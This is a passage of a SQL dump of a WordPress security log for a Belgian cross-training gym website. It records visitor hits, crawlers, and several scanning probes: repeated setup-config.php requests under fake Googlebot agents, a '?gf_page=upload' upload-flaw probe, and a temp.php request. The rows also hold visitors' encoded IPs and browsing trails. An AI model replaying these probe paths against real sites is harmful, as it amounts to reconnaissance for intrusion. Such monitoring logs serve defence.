(73881, 1496056380.718953, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/news/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73882, 1496057542.130471, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wordpress/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73883, 1496057765.010662, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/web/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73884, 1496057798.096064, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73885, 1496057843.774834, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/test/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73886, 1496058174.284421, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/blog/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73887, 1496058399.701221, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73888, 1496059019.888554, 1538375237, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0ahUKEwjIz5XuhZXUAhVBLFAKHSACByI4ChAWCEwwAg&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Flequipe%2F&usg=AFQjCNEwoxlHryNYgAimC6M0_H4bYObfZQ', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(73889, 1496059022.699220, 1538375237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(73890, 1496059044.279244, 1538375237, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(73891, 1496059045.758371, 1538375237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(73892, 1496060008.078140, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/home/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73893, 1496061060.971558, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73894, 1496061861.582839, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/new/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73895, 1496062000.287728, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wordpress/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73896, 1496062410.482558, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cms/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73897, 1496065151.480641, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/main/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73898, 1496065234.593510, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/news/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73899, 1496067232.182427, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(73900, 1496067668.951688, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/main/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73901, 1496070297.640355, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(73902, 1496070298.202844, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73903, 1496070298.649914, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73904, 1496070299.096109, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73905, 1496070299.533634, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73906, 1496070299.981209, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73907, 1496070300.540274, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73908, 1496070300.970584, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73909, 1496070301.390472, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73910, 1496070301.933530, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73911, 1496070302.565333, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73912, 1496070316.501462, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/en/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73913, 1496071265.342093, 1055638166, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(73914, 1496071269.266793, 1055638166, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73915, 1496074985.962515, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73916, 1496074989.066050, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73917, 1496074994.701466, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73918, 1496074998.224754, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73919, 1496075002.996462, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73920, 1496075007.581397, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73921, 1496075012.312630, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73922, 1496075031.834673, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73923, 1496076769.478540, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73924, 1496076769.872116, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73925, 1496076775.599386, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73926, 1496076788.327573, 2297635928, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73927, 1496076801.368157, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73928, 1496076806.454499, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73929, 1496076818.847656, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73930, 1496076827.644249, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73931, 1496076832.755228, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73932, 1496076839.349857, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73933, 1496076845.556271, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73934, 1496076859.237334, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73935, 1496076866.674257, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73936, 1496077025.547416, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73937, 1496077025.920184, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73938, 1496077214.729868, 1489403232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?gf_page=upload', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(73939, 1496081475.647373, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(73940, 1496081476.781557, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73941, 1496081477.218504, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73942, 1496081477.654425, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73943, 1496081478.072780, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73944, 1496081478.884129, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73945, 1496081481.468342, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73946, 1496081484.079859, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73947, 1496081484.611249, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73948, 1496081485.232080, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73949, 1496081485.664708, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73950, 1496082094.738658, 2637637390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73951, 1496082095.169895, 2637637390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73952, 1496082382.700900, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(73953, 1496083792.520221, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73954, 1496083793.344148, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73955, 1496083794.103915, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73956, 1496083794.547137, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73957, 1496083795.127878, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73958, 1496083799.190448, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73959, 1496083799.724457, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73960, 1496083800.261071, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73961, 1496083800.780485, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73962, 1496083801.285683, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73963, 1496083801.799059, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73964, 1496083802.511489, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73965, 1496083803.050409, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73966, 1496083803.501936, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73967, 1496086533.125081, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73968, 1496086533.614566, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73969, 1496089649.800724, 1374761077, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50'),
(73970, 1496089654.040102, 1374761077, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50'),
(73971, 1496090841.613281, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73972, 1496093107.301275, 1834549080, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73973, 1496093109.559299, 1834549080, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0.2) Gecko/53.0.2 Firefox/53.0.2'),
(73974, 1496093123.141583, 1834549080, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73975, 1496093125.694278, 1834549080, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73976, 1496093159.513488, 1834549080, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73977, 1496093161.342304, 1834549080, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73978, 1496093230.928079, 1834549080, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73979, 1496093238.115751, 1834549080, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73980, 1496093239.487375, 1834549080, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73981, 1496093255.141760, 1834549080, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73982, 1496093263.978057, 1834549080, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73983, 1496093265.204872, 1834549080, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73984, 1496095054.595677, 786801765, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(73985, 1496096612.793216, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73986, 1496097225.131597, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73987, 1496097854.203372, 2637637583, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73988, 1496097854.758063, 2637637583, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73989, 1496099345.118645, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73990, 1496125322.365773, 2637637376, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73991, 1496125322.366609, 2637637376, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73992, 1496136292.930942, 3154485134, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(73993, 1496136293.653336, 3154485134, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73994, 1496136294.204977, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73995, 1496136294.735297, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73996, 1496136295.239744, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73997, 1496136295.745968, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73998, 1496136296.364801, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73999, 1496136296.970111, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74000, 1496136297.513093, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74001, 1496136298.034039, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74002, 1496136298.529600, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74003, 1496136474.221030, 1463941451, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9'),
(74004, 1496140287.300755, 2857634197, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/temp.php', 'http://crosstrainingcenter.be/temp.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
